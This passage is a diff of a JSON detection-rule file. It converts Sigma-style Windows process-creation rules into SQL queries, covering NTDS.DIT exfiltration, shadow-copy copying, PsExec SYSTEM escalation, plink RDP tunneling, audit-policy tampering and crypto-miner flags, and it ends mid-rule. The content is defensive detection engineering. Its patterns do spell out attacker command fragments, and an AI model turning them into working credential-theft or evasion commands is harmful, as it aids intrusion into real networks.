"PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine 